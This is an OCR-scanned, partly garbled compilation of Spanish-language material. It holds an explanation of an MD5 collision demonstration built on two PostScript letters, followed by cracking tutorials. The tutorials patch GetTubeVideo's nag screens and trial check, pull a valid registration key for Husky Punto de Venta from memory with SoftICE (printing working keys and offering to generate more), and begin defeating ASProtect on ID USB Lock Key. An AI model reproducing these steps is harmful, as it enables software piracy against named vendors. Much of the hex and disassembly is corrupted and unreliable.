00000190 72 29 20 73 68 6F 77 0D 0A 33 30 30 20 36 38 30 r) show. .300 680 
00000140 20 6D 6F 76 65 74 6F 20 28 S6 69 61 20 41 70 70  moveto (Via App 
000001B0 69 61 20 31 29 20 73 68 6F 77 0D 0A 33 30 30 20 ia 1) show, .300 
000001C0 36 36 30 20 6D 6F 76 65 74 6F 20 28 52 6F 6D 65 660 moveto (Rone 
000001D0 2C 20 54 68 65 20 52 6F 6D 61 6E 20 45 6D 70 69 , The Ronan Empi 
Order.ps 


E 
D 
0 


[/size] 


Of fset (01234562 639 dBb8€0D E y 

00000000 25 21 50 53 2D 41 64 6F 62 65 2D 31 2E 30 0D 0áA X!PS-Adobe-1.0.. 
00000010 25 25 42 6F 75 6E 64 69 6E 67 42 6F 78 3A 20 30 X%BoundingBox: 0 
00000020 ¡20 30 20 36 31 32 20 37 39 32 20 20 20 20 20 20 0 612 792 
00000030 __20 20 20 20 20 20 20 20 20 20 20 20 20 0D 04 28 al 
00000040 E8 42 A6 6A DE 4D 00 E0 DS 89 SF F8 ES 9€ C1 A? eB|jbM.3401_0á1ÁS 
00000050 2F CA B7 97 0A 46 7E AA CO 03 54 3E B1 FB ?7F 08 /E-1.Fv2A.T>tú1. 
00000060 45 6D 33 05 01 FC 53 EO 5B EF A0 83 13 A3 78 52 En3..iSáa[i 1.txR 


00000080 2F BD 0F 95 FS $7 ES 76 3A EC BF AA 0F 0B D9 CA /%.13Wáv:i¿2..DE 
00000090 |B5 73 59 C8 32 F4 7D 0B_ 2C B9 A3 76 D4 36 1E 20 psYk26)..*£v06. 

00000040 FD EF 3B 83 Al F2 7D EB CA 36 1C 53 86 D8 6B C8 pi;11o)e£6.SIOKÉ 
000000B0__F4 94 F4 4E 61 1F 7C 84 80 60 CF 6F 94 BS 03 90 ótóNa.| 11 loty. 1. 
000000C0 29 28 ES 42 A6 6A DE 4D 00 E0 D5 89 5F FS ES 90 )(8B¡3PM.a01_aál 

000000D0 C1 A? 2F CA B7 97 0A 46 7E AA CO 03 54 3E B1 FB ÁS-£-1.FY3A.Tiiá 
D00000E0 '?F 08 45 6D 33 05 01 FC” 53 E0 SB EF A0 863 13 A3 1.Em3..úSá(i P.£ 
000000F0 78 52 SA 33 CE 36 99 0D 9C 07 6E 45 5A 52 84 xRíZ3161.1.nEZR1 
00000100 79 EB 2F BD OF 95 FS $7 ES 76 34 EC BF AA 0F 0B ye/%. foVáv:i¿?.. 

00000110 D9 CA BS 73 $9 C8 32 F4 7D 0B 2C B9 A3 76 D4 36 DEpsYE26).,*£v06 
00000120 1E 20 FD EF 3B 83 Ai F2 7D EBCA 36 1C 53 86 D8 . yi:1ió0)éÉ6.SI0 
00000130 6B C8 F4 94 F4 4E 61 1F 7C 84 80 60 CF 6F 94 BS kEófóNa.|11' Íotp | 
00000140 03 90 29 65 71 7B 2F $4 69 6D 65 73 2D 52 6F 6D .I)eqí/Tines-Ron 
00000150 61 6E 20 66 69 6E 64 66 6F 6E 74 20 32 30 20 73 an findfont 20 s | 
00000160 63 61 €C 65 66 €F 6E 74 20 73 65 74 66 6F 6E 74 calefont setfont 
00000170 20 0D 0A 33 30 30 20 37 30 30 20 6D 6F 76 65 74  ..300 700 movet 
00000180 '6F 20 28 4A 75 6C 69 75 73 2E 20 43 61 65 73 61 o (Julius. Caesa | 
00000190 72 29 20 73 68 6F 77 0D 04 33 30 30 20 36 38 30 r) show..300 680 | 
000001A0 20 6D 6F 76 65 74 6F 20 28 56 69 61 20 41 70 70 noveto (Via App 
000001B0 /69 61 20 31 29 20 73 68 6F 77 0D 04 33 30 30 20 ia 1) show. .300 

000001C0 36 36 30 20 6D 6F 76 65 74 6F 20 28 52 6F 6D 65 660 noveto (Rome 
000001D0 2C 20 $4 68 65 20 $52 6F 6D 61 6É 20 45 6D 70 69 , The Roman Enpi 


letter_of_rec.ps 


[/size] 


Por qué 64 bytes? Porque como hemos dicho antes, el algoritmo MD5 va "hasheando" de 512 en 
512 bits (64 bytes). 


Así que vemos que el primer bloque de 64 bytes es común en ambos .ps, dado que es la 
cabecera, que ha sido retocada convenientemente para que ocupe exactamente eso. 


Bien, y también vemos que los siguientes dos bloques de 64 bytes corresponden exactamente a 
los caracteres del primer paréntesis. 
Estos dos bloques difieren de un ps a otro. 


A partir del 4 bloque, ya todo es común para ambos .ps. 
Ahora ya todo se ve más claro. 


Han montado la cabecera Cab para que ocupe 64 bytes. Luego han creado dos versiones A y B 
añadiendo 128 bytes aleatoriamente buscando una colisión tal que MD5(Cab + A) = MD5(Cab + 
B). 


En este punto, como el resto del código es igual para ambos documentos, ambos documentos 
compartiran hash, así que lo que se hace es mirar si el documento tiene A o B para enseñar una 
carta O la otra. 


Estado actual de las funciones Hash. 


La función hash MD4 está totalmente rota y descatalogada, de hecho existen algoritmos que 
encuentran colisiones en pocos segundos. 


Para el uso del MD5 hay que tomar ciertas precauciones, pero cualquiera que se haya leido este 
artículo está capacitado para tomarlas. Lo mejor es no usarlo, pero si no nos queda más 
remedio, usándolo con cuidado es perfectamente seguro. Por ejemplo no firmeis nada usando 
MD5 si el que redacta el documento a firmar es parte interesada, o antes de firmarlo modificad 
algo del documento, o guardad copia, etc. 


Para SHA1, yo no diría como se dice en muchos sitios que el edificio está en llamas y que 
estamos perdidos. Lo único es que las alarmas suenan, aunque no veamos aún el humo, y lo 
prudente es ir hacia la salida de emergencia, pero no hace falta correr ni que cunda el pánico. 
Pero tampoco hay que quedarse en el sitio, porque los ataques criptoanalíticos cada día 
mejoran, y cada será más fácil y rápido. 


La solución que se está dando a esta problemática es ir incrementando el tamaño de los hashes. 
PGP ya usa SHA256, etc. Pero es solamente un parche. Estos algoritmos son todos monocultivo, 
y dándoles mas bits solo incrementas el esfuerzo para encontrar colisiones. Pero según avancen 
los métodos de criptoanálisis y la potencia de los ordenadores, se irán recortando los tiempos, y 
estaremos en las mismas. 


El punto más crítico es el legal. Todo lo que se firme con un certificado legal o con el futuro DNI 
electrónico, tiene el mismo valor que una firma manuscrita. 


Esta consideración legal se sustenta entre otras cosas en que el algoritmo de hash de la firma 
funciona como tiene que ser y que el hash resultante es único para el texto firmado. 


Si un sistema no puede garantizar que es tal el documento que has firmado, y que no hay 


posibilidad de que te hayan dado el cambiazo con otro documento que tiene el mismo hash, 
todos los documentos firmados por esa aplicación no serán legales. 


Teneis el caso de las fotografias de tráfico de Australia sin ir más lejos: 
http: //www.hispasec.com/unaaldia/2489 


Solución? Muy simple. Usando dobles hashes. 
La gente no le da la importancia que tiene al problema de las colisiones, y si se la dan, por 
ejemplo PHP, no lo solucionan como es debido. 


Si para firmar algo en vez de cifrar el MD5 o el SHAl o el SHA256 del documento, se cifrara una 
concatenación por ejemplo de MD5+SHA1, habría que buscar una colisión doble para conseguir 
un documento alternativo, lo que actualmente es imposible. 


Si teneis que usar las firmas electrónicas para vuestros documentos, y se van a firmar por 
ejemplo usando MD5, añadidles un campo estilo fingerprint con el hash del documento en SHA1. 


« Última modificación: 28 Diciembre 2005, 21:11 por Unravel » 


Crackeando GetTubeVideo v3.2 


Bueno gente, este es mi primer tutorial, he empezado por un programa interesantísimo y útil, 
el programa en cuestión es el GetTubeVideo, es capaz de descargar videos desde youtube, 
metacafe, y web similares donde utilicen un reproductor de archivos flv. 


Cargamos el programa en el Peid y vemos si tiene alguna protección, lo analizamos y vemos 
que no tiene ninguna y nos dice que está hecho Microsoft Visual C++ 6.0. 


PE¡D v0.94 


File: [C: Program Files|GetTubeVideoGetTubeVideo.exe 


D004AAOF EP Section: 


0004AA0F First Bytes: 


: 16,0 Subsystem 


Microsoft Visual C++ 6.0 
Multi Scan 


Empecemos: 


Ejecutamos el programa y nos sale una linda Nag que nos dice que por favor registremos 
nuestra copia del programa, y que tenemos 15 días para hacerlo. 


GetTubeVideo v3.2 by KJD 


Please register your copy! 


“You can register the program online by visiting our secure order page. Áll online 
transactions and financial data are encrypted. W'e accept Visa, MasterCard, American 
Express, Discover? Novus, Eurocheques, Eurocard, and wire transfers. 


15 of 15 days has left. 


Esperamos 5 segundos, se habilita el botón “Try” y podemos probarlo. Se nos abre la pantalla 
principal y lo investigamos, descargamos algún video de youtube etc., y nos damos cuenta de 
que podemos darle cualquier formato tanto de video como de audio. (la verdad un gran 
programa) pero lo principal de todo esto es que el programa es totalmente funcional, no 
tenemos ningún tipo de limitación salvo los 15 días de uso por lo tanto ya que no soy muy 
hábil traceando seriales y que el programa es totalmente funcional, lo que hare será eliminar 
la molesta Nag de entrada. Cerramos el programa y vemos que tenemos otra nag, pero ahora 
de salida. 


Buy GetTubeVideo! 


Please let us know if the GetTubeVideo program has been making life easier for 
you and helped you to solve your problems. We actually care about what people 
think about our software and always welcome your feedback. 


CG) (e) (cen) 


It's 100% risk-free to buy GetTubeVideo. Testit for 15 days. Should you have 
any problems whatsoever, please don't hesitate to contact us and we will make a 
refund for you. 


Click Here To Go To The Order Page... 
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OLLYDBG: 


Cargamos el programa en olly, buscamos indicios de la primera nag, vemos que en 
“All referenced text string” no encontramos ninguna referencia a la primera Nag. Lo que me 


hace que este programador se ha esmerado un poco en tapar los puntos obvios. Aquí 


podemos aplicar cualquier método conocido para caer en la zona caliente del código, ya sea 


por MESSAGESPY, HMEMCPY (que por cierto en mi maquina no anda) o cualquier otro. El 


método que usare yo es un método sencillo que uso para nags de entrada, dado que estas, en 


la mayoría de los casos, son lo primero que se ejecuta del programa, lo que haremos es correr 


el programa con Ctrl+F8 (Animate Over) para poder ver que call es la que llama a la nag. 


Ctrl+F8 y olly deja de tracear en 0044AAE9. 


B044AADD 
BB44ARES 
6044ARE1 
B044ARE2 
B044ARES 
BO044ARE9 
B044AREE 
B044AAF 1 
B044AAF2 
1BB44ARF? 
BB44RAFA 
B044AAFC 
B044AAFE 
0044ABD1 


BB44ABDA 


6A BA 
58 

50 

FF?S 9C 
56 

56 


PUSH BA 
POP EAX 
PUSH EAX 
PUSH 

PUSH ESI 
PUSH ESI 


pModu le 


FF1S 74246001 CALL DWORD PTR DS: [<é¿KERNELS2. GetModu lel LGetModu leHandleA 


50 

Es 794381600 
3945 AB 

50 

Es 63240000 
3B45 EC 
3B08 

3B09 

3940 98 

50 

51 

Es 65410000 
59 

59 

c3 


PUSH EAX 


mou ,¿EAX 
PUSH EAX 


MOU EAX, 
MOU ECX,DWORD PTR DS: CEAX] 
MOU ECX,DWORD PTR DS: [ECX] 
MOU DWORD PTR SS: [EBP-681,ECX 
PUSH EAX 

PUSH ECX 


POP ECX 
POP ECX 


Vemos que no hay nada interesante, ponemos un BP en 0044AAES9, Ctrl+F2 para volver a 


cargarlo y le damos F9, para en el BP que pusimos antes, F7 y entramos en el call. 


BBSAF3EB||. 
ABSAF3 . 
BBSAF HH. 

AF . 


sesarFs7c|L. 


A 
FF7424 10 PUSH 
FF7r424 10 PUSH 
FF7424 10 PUSH 


FF7424 18 PUSH 
Es 71DE0000 
C2 1008 10 


F8 hasta llegar al call y F7 para entrar. Volvemos a apretar Ctrl+F8 y para en 0O5BD231 
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MUSBUZ 5 BBLF 
ABSBD . FF9A 32400009 
BBSBD22S . 85C0 
BOSBD22B | ..,74 22 
BBSBD220|| > | 8B06 
BBSBD22F|] . | SBCE 

. |FFS6 59 

. |85C0 

«| 76 15 

. |8B4E 1C 

. | 8509 
IBSBDZ3D|f ..| 74 05 
BOSBD23F|] . | 8BO1 
B605BD241|] . | FFSO 58 
B65BD244|| > | 8B06 
BBSBD246|] . | SBCE 
005BD248|]. | FFSO 68 
5B05BD24B|| ..| EB 07 
B65BD240|| > | 8B06 
BBSBD24F|] . | SBCE 
BBSBD251||.. | FFSO 54 
665BD254|| > | 8BD8S 
0058D0256/| > >E8 51490200 
BBSBD25B|]. SF 
BBSBD25C|].. SBC3 
BBSBD25E|].. SE 
GOSBD2SF||. SB 
BOSBD260|L. C2 10009 


Muy ELX, EUIL 
CALL DWORD PTR DS: [EAX+84] 
TEST EAX,EAX 


MOV EAX,DWORD PTR DS: [ESI] 
MOU ECX,ESI 

CALL DWORD PTR DS: [EAX+50] 
TEST EAX,EAX 


MOU ECX, DWORD PTR DS: [ESI+1C] 
TEST ECX,ECX 


MOU EAX, DWORD PTR DS: [ECX] 
CALL DWORD PTR DS: [EAX+58] 
MOU EAX, DWORD PTR DS: [ESI] 
MOV ECX,ESI 

DWORD PTR DS: CEAX+68] 


MOU EAX, DWORD PTR DS:[ES1] 
MOU ECX,ESI 
CALL DWORD PTR DS: [EAX+54] 
MOU EBX, EAX 


POP EDI 
MOV EAX, EBX 
POP ESI 
POP EBX 


RETN 10 


Aquí el código ya es más interesante, vemos varios saltos y varias calls, si nos fijamos bien justo 


antes del call que muestra la nag tenemos un salto que se pasa esta call, si la cambiamos por 


jmp, y probamos, el programa muere, pero andamos cerca, ponemos un BP en el call, Ctrl+F2, 


F9, y para en 005BD231, F7 para entrar y 
para en 0040F37B. 


Ba4BF34 
34 


. 8B75 DS 

BB 02000000 
3B0D 3005660 
+ 895D FC 

. 8B41 FS 

. 8508 


om 


. [6A BB 

- |8D38D CCFEFFF 
. ¡ES CFICFFFF 
+ |8D3D CCFEFFF 
+. |C0645 FC 15 

. [ES 10200500 
-. (13D ECOS0B0a 
OFS5 9500000 
. ¡Al 40056600 
. | 8508 

0F34 3800000 


Acá tenemos algo parecido a lo anterior, 
antes tenemos un mov, test y ¡nz, lo que 


nuevamente Ctrl+F8, después de varios loops que da, 


PE 
Mou ESI,DUORD PTR SS: [EBP-281 


MOV EBx, 2 

MOU ECX, DWORD PTR DS: [660530] 
mou »EBX 
MOU EAX, DWORD PTR DS: [ECX-8] 
TEST EAX,ERX 


«o ¡BFES BAB1OBA! JNZ 


CMP EAX, SEC 


MOU EAX, DWORD PTR DS: [6605407 
TEST EAX,EAX 


tenemos la call que llama a nuestra nag y un poco 
me hace pensar que si cambio el jnz, por jmp, me 


saltare la call que llama a la nag. Y bueno pruebo cambiando el salto y probamos, apretamos 


F9 y voila!!!!, primera nag lista!!!. Guardamos lo cambios en el ejecutable y probamos 


adelantando el reloj de Windows 1 mes, ejecutamos el programa y vemos que sigo 
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Segunda Nag: 


Bueno, ahora vamos por la segunda nag, la de salida, cuando me puse a trabajar con la 
segunda nag surgió algo interesante, haga lo que haga no podía llegar al código que la 
generaba, intentaba con TranslateMessage, con showWindow y nada, También intente 
ponerle BP en el botón de la ventana y nada tampoco paraba, (aclaro que no me funciona el 
HMEMCPY). Entonces pensé que tal vez esta ultima nag, se generaba al inicio del programa y 
luego la mostraba. Por lo que volví al código de la primera nag, más precisamente en: 


0040F359 . 8B41F8 MOV EAX,DWORD PTR DS:[ECX-8] 
0040F35C . 85C0 TEST EAX,EAX 
0040F35E . 0F85 0A010000 JNZ GetTubeV.0040F46E 


Si nos fijamos bien esta rutina testea si la dirección de memoria (ECX-8) es cero o no, si es cero, 
no salta y nos muestra la primera nag, por lo que pensé que esta dirección de memoria se 
debe usar para testear si estas registrado o no, bueno veremos, ponemos un BP en 0040F359 


para obtener esta dirección de memoria que testea. 


OB4BF356 895D FC MOU DWORD PTR SS: EBP-4], EEx 


. 8B41 FS MOU EAX, DWORD PTR DS: [ECX-8] 


BB4BF35C| . 8500 TEST EAX, EAX 
0B40F3 «y BFSS BAB1OBOÍ JNZ 

1O04BF36 5A Ba PUSH 
0040F366 38D8D CCFEFFFI LEA ECXx, 


. ES CFICFFFF | CALL 
1| . 8D8D CCFEFFFÍ LEA ECX, 
0645 FC 15 
ES 10200500 
3D ECO30000 |CMP ERX,3EC 


DS: [00655474 ]=00000000 
ERX=00000000 


[Address |Hes duna 


F9 y como vemos, olly para en el BP y nos traduce ECX-8 en 00655474, bueno, la seguimos en 
el dump y vemos que esta a cero, tal como pensaba. Bien les comento que lo que hice fue 


ba4a 
BaB4OF3 
BB4BF37 


BA4BF330 


poner un HBP on Access, y apretar F9, el programa para miles de veces, la conclusión que 
saque fue que esta dirección de memoria es de uso general, que sirve para varios testeos, por 
lo que elimine el BP, le di F9 para correr el programa y luego puse el BP. Entonces, con el 
programa en ejecución pongo un HBP on Access en esta posición de memoria, voy al programa 


y lo cierro, y vemos que para en 004068FD. 
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- ES DEDLUIVO | UHLL LETIUDEV.WUFILCDW 
. Ai 3CB566008 |MOU EAX, DWORD PTR DS: [668530] 
. 8B48 FS MOU ECX,DWORD PTR DS: [EAX-8] 


. 8509 TEST ECX,ECX 
«y 75 6B 

. 68.08 PUSH B 

. 8D4C24 108 |LEA ECX, 

. ES 24C4FFFF | CALL 

. 8D4C24 BC |LEA ECX, 


. [738424 9C000 
. ES 7OAABSOO 

. 8D08C24 840001 LEA ECx, 
. [78424 9C000 


Jejejeje no les parece conocido esto????, es la misma rutina de la primera nag. Probamos 
cambiando el jnz por jmp, sacamos el HBP y le damos F9 y el programa se cierra. Habremos 
hecho bien???, salvamos los dos cambios en el ejecutable y lo abrimos, vemos que la primera 
nag no aparece, después de testear el programa y ver que todo funciona bien, lo cerramos y 
vemos que la segunda nag no aparece, ósea, programa resuelto!!!. 


Conclusiones: 


Solamente con estos dos cambios, eliminamos las dos Nag y el periodo de prueba, les dejo a 
ustedes sacar la palabra unregistered del menú About y los menús Buy Now! Y Register. 
Anímense que es fácil. 
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SACCOPHARYNX Cracking Tutorial 
Programa: Husky Punto De Venta v?.?? 
Tutorial 012 


PROTECCION: Número de clave. 

Objetivo: Encontrar la clave de registro. 

Descripcion: Supongo que es una aplicación para facturacióon en puntos de venta. 
Dificultad: Newbie, Facililla, Media, Avanzado, Difícil, Elite. 

DOWNLOAD: http://www.citynet.com.ar/siles/download.htm 

Herramientas: Simplemente SoftICE. 


CRACKER: SACCOPHARYNX FECHA: 07/04/2003 
INTRODUCCION 


Después de unos cuantos meses sin crackear nada debido a muchos problemas personales, he decidido 
volver al cracking y dedicarle este tutorial a mi buen y querido amigo piratón, llamado El Gato 
Surfeador, ya que crackeé Husky Punto de Venta a su pedido. Espero que este tutorial te sirva, 

Gato piratón, dejá de robar en la facultad y ponete las pilas con Sistemas Operativos IT, : - ) 

En primera instancia quiero agradecer a todos los crackers que durante estos meses me 

consideraron para pedirme ayuda. Lamento no haberlos ayudado, pero realmente mi ánimo estaba por 
el piso y no crackeaba nada ni siquiera para mí. Bueno, este tutorial se basa en Husky Punto de 

Venta v?.?? (HPV de ahora en más). 


AL ATAKE 
Intro 


Simplemente otro software administrativo-contable hecho en Visual Fox Pro v7.0. 


Pesentando a la victima 


Este software no está empaquetado ni nada por el estilo, y es un TRIAL que funciona por 60 días 
(eso creo). Y para para eliminar dicha protección encontraré el serial correcto. 


Manos a la obra 


Una vez instalado HPV y que lo ejecutamos, nos aparece la primer NAG: 

En mi caso el número de registro es: 3370-40655-36035, pero este varía de una instalación a otra. 
Click en Aceptar y accedemos a HPV para ir a la última opción del menú llamada Número de Clave, 
donde ingresaremos una clave personal de uso cualquiera: 

pero antes de hacer un click en Aceptar, accedemos a Softice con Ctrl+D y ponemos el siguiente 
breakpoint: 


bpx messageboxexa 

presionamos ES y volvemos al programa. Ahora sí, le damos a Aceptar y salta Softlce justo en el 
breakpoint. Apretamos una vez F11 y se muestra el mensaje: 

le damos a Aceptar y automáticamente volvemos a Softlce para seguir traceando con Fl0 hasta salir 
de la API messageboxexa y retornar al código del programa (HPV) dentro de SoftICE. Una vez en el 
programa (siempre dentro de Softlce), buscamos en la memoria los primeros 3 números de la clave 


personal que ingresamos: 
s 177:00000000 1 FFFFFFFF "12389" 


poquito en la pantalla de datos, veremos algo muy curioso: 


byte PROT--—- (0) 
0177:00E9B740 00 00 00 00 00 00 OA 00-00 00 00 00 05 00 00 00 ...oo.ooooooo.... A 
0177:00E9B750 00 00 00 00 00 00 00 04-31 04 00 00 00 00 00 00 ........ ies A 
0177:00E9B760 43 00 00 00 93 00 00 00-64 1D EF 00 00 00 00 00 C....... e 
0177:00E9B770 00 00 00 04 72 04 00 00-00 00 00 00 43 00 00 00 ....P.o...... De 
0177:00E9B780 05 00 00 00 31 32 30 38-36 00 El 40 00 00 00 03 ....12096..f.... 
0177:00E9B790 6A 04 00 00 00 00 00 00-43 00 00 00 05 00 00 00 j....... es 
0177:00E9B7A0 32 30 34 37 36 00 E7 40-00 00 00 03 69 04 00 00 17476..f....i.. 
0177:00E9B7B0 00 00 00 00 43 00 00 00-05 00 00 00 30 31 32 38 ....C....... 0141 
0177:00E9B7C0 33 00 A7 40 00 00 00 03-68 04 00 00 00 00 00 00 5..€....h....... 
0177:00E9B7D0 43 00 00 00 05 00 00 00-37 38 39 31 32 00 00 00 C....... TB. 
0177:00E9B7E0 00 00 00 03 66 04 00 00-00 00 00 00 43 00 00 00 ....L....... E 
0177:00E9B7F0 05 00 00 00 34 35 36 39-30 00 00 00 00 00 00 03 ....45690....... 
0177:00E9B800 65 04 00 00 00 00 00 00-43 00 00 00 05 00 00 00 e....... PO 
0 


177:00E9B810 31 32 33 38 39 00 00 00-00 00 00 03 64 04 00 00 12389....... As 


0177:00E9B820 00 00 00 00 43 00 00 00-01 00 00 00 35 00 00 00 ....C....... Dios 
0177:00E9B830 00 00 00 00 00 00 00 03-2B 04 00 00 00 00 00 00 ........ ao 
0177:00E9B840 49 00 0A 00 00 00 00 00-10 00 00 00 00 00 00 00 T...cco.o........ 
0177:00E9B850 00 00 00 03 2A 04 00 00-00 00 00 00 43 00 00 00 ....*....... Cira 
0177:00E9B860 0F 00 00 00 C4 1C EF 00-30 34 37 00 00 00 00 03 ........ 04T7..... v 

==352 USER32 !CheckMenuRadioltem+0025 PROT32- 
Esto es moy sospechoso. Los números en celeste s son la clave personal falsa que ingresamos, pero 


corresponde al número de tepistro 3370 -40655- 36035, por lo tanto si deshabilitamos el breakpoint 
con el comando bd*, apretamos F3 para volver a HPV, e igresamos dicha clave personal (en mi caso 
01415-17476-12096) obtendremos este hermoso mensaje: 

Listo, de esa forma obtenemos la clave personal y eliminamos la limitación TRIAL. 

Algo interesante a saber es que si cuando buscamos en la memoria la clave falsa, también buscamos 


el número de registro con el comando: 
s 177:00000000 1 fP£FFEFF "3370" 


al dar enter Softlce salta en la dirección 177:00EF7811 donde vemos: 


byte PROT (o) 
0177:00EF7811 33 33 37 30 34 30 36 35-35 33 36 30 33 35 00 01 33704065536035. 
0177:00EF7821 00 EF 00 6C 00 00 AO OF-00 00 00 68 00 00 00 FF ...l....... h.... 


Bueno, entonces lo curioso es que si editamos dicha dirección de memoria e introducimos otro 
Número de Registro generado en otra instalación del software, por ejemplo 3570-45655-36055, de 
modo que quede así: 


byte PROT (0) 
0177:00EF7811 33 35 37 30 34 35 36 35-35 33 36 30 30 35 00 01 35704565536055. 
0177:00EF7821 00 EF 00 6C 00 00 AO OF-00 00 00 68 00 00 00 FF ...l....... OS 


en el formulario de registro debemos ingresar la clave personal correspondiente a 3570-45655- 
36055, (la cual es 01495-19619-12103 y la obtemos de la misma forma que la anterior), porque el 
número de registro se toma de esta dirección de memoria que hemos cambiado. 

Un tutorial muy sencillo. Esto va para vos Gato Surfeador, como sé que sos un fiaca y no vas a 
instalar el SoftICE para obtener la clave personal (ya que las que están aca no te servirán 

porque el número de registro generado en tu PC es muy probable que sea distinto a los míos), te 
digo que me mandes por e-mail tu número de registro y yo busco la clave personal que le 
corresponde usando el último método descripto. 

Bueeeeeee, eso es todo. 


Saludos 


Un saludo a todos los crackers que realizan tutoriales. 


Desde las profundidades del abismo... 


http://www.iespana.es/saccopharynx 
saccopharynx O yahoo.com 
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THE TRUTH IS OUT THERE 


THUNDER 


SEEK IT 


Un saludo para todos los que lean este mi primer tutorial de cracking de aplicaciones. 
Primero que todo vale aclarar que soy bastante newbie en esto (llevo solo unos meses), 
por lo que le pido disculpas a los maestros si en algún momento(s) me equivoco o meto 
la pata en algo, o no hago las cosas de la mejor manera, discúlpenme, estoy 
aprendiendo, y sus criticas y consejos serán muy bien recibidos en todo momento. 
Bueno, nada, que a pesar de haber crackeado unos cuantos programas comerciales (nada 
del otro mundo, la mayoría simples o mis técnicas muy toscas) por lo que no me había 
decidido a realizar un tutorial como tal con todas las de la ley, quería que el primero 
fuera de una App “digna” y bueno, creo yo que sea esta, tal vez para ti no sea gran cosa 
pero para mi es una gran satisfacción haberle vencido a su rutina de registro. 


Pues yendo al grano, la cosa empezó cuando decidí bajarlo de la red. Fue exactamente 
en la Web htto://www.idsecuritysuite.com donde lo encontré, además de varios 
programas de seguridad y hasta uno de protección de aplicaciones contra cracking. 
Sin mas lo descargue, lo instale y me dije a mi mismo: “Mi mismo, si esta gente 
hicieron una App para proteger ejecutables, como estarán protegidas sus propias 
creaciones? :X “Si logras crackear esta aplicación, le tienes que hacer un tutorial”...me 
termine de decir sin mucha fé. Pero me encontré con una sorpresa, ya verán. Bueno, 
basta de charla (discúlpenme por tanta lata...tenia que desahogarme...este es el primero 
caballero, acuérdense de eso...jeje. ;-) 


--->>>MISSION BRIEFING... 
Víctima: ID USB Lock Key 
Versión: 1.2 
URL: http: //www.idsecuritysuite. com/products/id- 
usb-lock-key.htm 
Protección: Serial 
Dificultad: Newbie Avanzado (Al menos para mi) 


Herramientas: RDG Packer Detector, OllyDbg y plugins. 


Compilador: ASProtect v2.2 - Borland Delphi v6.0 - v7.0 


Cracker: Thunder 


Lugar/ Fecha: Cuba - 26/12/2008 
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--->>>VICTIM INFO... 


ID USB Lock Key 1.2 (c) Fastlink2 


ID USB Lock Key is a handy utility that allows you to protect your personal computer 
from unauthorized access. You can use ID USB Lock Key to restrict access to your PC. 
Tt's attractive, secure, and very easy to use. It starts automatically with Windows. You 
can lock you computer just by clicking one button in the system tray or using custom 
hotkey. Then ID USB Lock Key will display a lock screen and protected your computer. 
The windows hotkey and mouse will be disabled. You only need to enter the USB 
Memory Stick where you have the protection key generated. 


When you're Idle (like screen saver) or you press Ctrl+L, your PC will be locked. Even 
boot into SAFE MODE will not restore the previous state. When you insert your USB, 
your PC will be unlocked. 


Features 


- Generate for one or more USB Sticks keys for protecting your PC 

- Lock and protect your computer when you leave 

- Lock your PC (with Ctrl+Alt+ Del protected) using a USB disk (Flash Drive) 
- Display a lock screen 

- Easy-to-use graphical user interface 

- Very simple and convenient graphic interface 

- Very small and fast 


Requirements 


This program requires Windows 95/98/Me/NT/2000/XP/Vista or higher. 


--->>>ATTACKING... 


Bueno, ahí la tienen, bien interesante. La ejecuto y me sale su pantalla inicial. Luego me 
dirijo a la opción REGISTER que se encuentra debajo y me sale esta ventana en la que 
introduzco mis datos. 


ID USB Lock Key 


Main website: E ; 
Purchase page: http: /4wwidsecuritysuite. c: El hten 
Support email. supportilidsecuritysuite com 
Í 
License Id: 
a | | O ecos | 
Registration Code: F 
=DCAFFÍA7AG2551 ¿INS A paris 


Presiono el botón Register y... 
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ID USB Lock Ke: 


Incorrect Registration Code! 


Parece que no le atinamos...bueno, vamos a ver por donde viene la cosa, todos cruzando 
los dedos...jeje. Le pasamos el RDG y esto es lo que nos dice. 


noti? aCKer Selecior VS oa) -):) 
C:árchivos de programalID Security SutteWID USB Lock Abrir 


Borland Delphi v6.0 - v7.0 Compilador 
ASProtect SKE v2.2 Detectado 


Asprotect Detección Heurística Posible e 


Contacto; - vww.aspack.com/asprotect htm Al Frente [] 


Origen Lenguaje: U.S. English + Inglés Y aaa 1) Detectar 


0 Archivo Escaneado en 158580. O MA € M-B 030039930 7 


Como vemos nos vamos a enfrentar al Borland Delphi, pero antes vamos a tener que 
lidiar con el ASProtect v2.2, bueno, podría haber sido peor (VB/Execryptor). Sabiendo 
esto me dirijo a los unpackers automáticos para agilizar la cosa. Después de haber 
pasado por cerca de cinco o seis unpackers sin tener resultados satisfactorios me resigno 
a meterle mano con el Olly, así que lo cargo en el mismo y me froto las manos mientras 
le digo: “Te voy a coger con las excepciones”. Después de quince minutos tratando con 
excepciones, scripts, tutoriales y la madre de los tomates no di pie con bola. “Ahora si 
que se trabo la cosa”, me dije mientras me ponía las manos en la cabeza. “Vas a tener 
que hacerlo de otra”, me volví a decir mientras me lamentaba el que no tendría ya 
oportunidad de parchear si la cosa se ponía fea al no poder desempacar ni aun usar 
DeDe, E2A ni nada parecido, la cosa se puso fea. Solo me quedaba una de dos: O 
encontrarle un serial O encontrarle un serial....por lo que me fui por la primera. Ya un 
poco desanimado al empezar con el pie izquierdo volví a cargar la App en el Olly. 


plo kid hilo ba a al LE 
FORCE LECCE DEL 


== 01000000 


3 EBX 

E2722735 MOU EAX, DWORD PTR DS: [3527722] 
BECA9BBE SBCABE 
REDA Far return 


TEST EBX,ESP 
Unknown command 
pd DX, DWORD PTR ES: [EDI] 1/0 command 


9B 
25 3D79DE1E 
FD 


OUT DX, ERX 1/0 command 


EF 
626D_97 BOUND, ÉBP, WORD PTR SS: [EBP-69] 
FA ARNCIF7ZAS 
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La corrí con F9 y no me salto ningún antidebuging ni excepción (no digo yo, con la 
cantidad de plugins que le tengo enganchado al Olly...jeje). Bueno, aquí llego la parte 
decisiva, esta la aprendí del maestro Ricardo. Con la aplicación corriendo en el Olly me 
fui a la ventana de Memory Map y le puse un Memory BreakPoint en la sección code. 


1uUS- UU] MUI ZU Yew In Disassembier Enter 
00400000 0OBB1098| Admin PE header ] 

00401000 60097000 Admin. code — Dumpin CPU 

00492000) OBBOZO 
00051900! Admin Dump 


00001000 Admin Search Ctrl+B 


8/Adnin  |.rsro [resources  3etbreak-on-access F2 
90040008 | Adrin «data imports, re 


Ory DreaRpolnt on ací 


Set memory breakpoint on write 


DOBOASOa 
10620000 | DOBB200B 


Ahora cuando intento regresar a la aplicación, el Olly se detiene en el Memory 
BreakPoint. 


pa 


ES ADCEF9FF 
E9 SFCSFIFF 
EB EB 


>> 


Si miro al caption de mi Olly, este me confirma que estoy en el lugar correcto. 


A PhantOm- 100 - mam thr3ad, mudule Adi] 


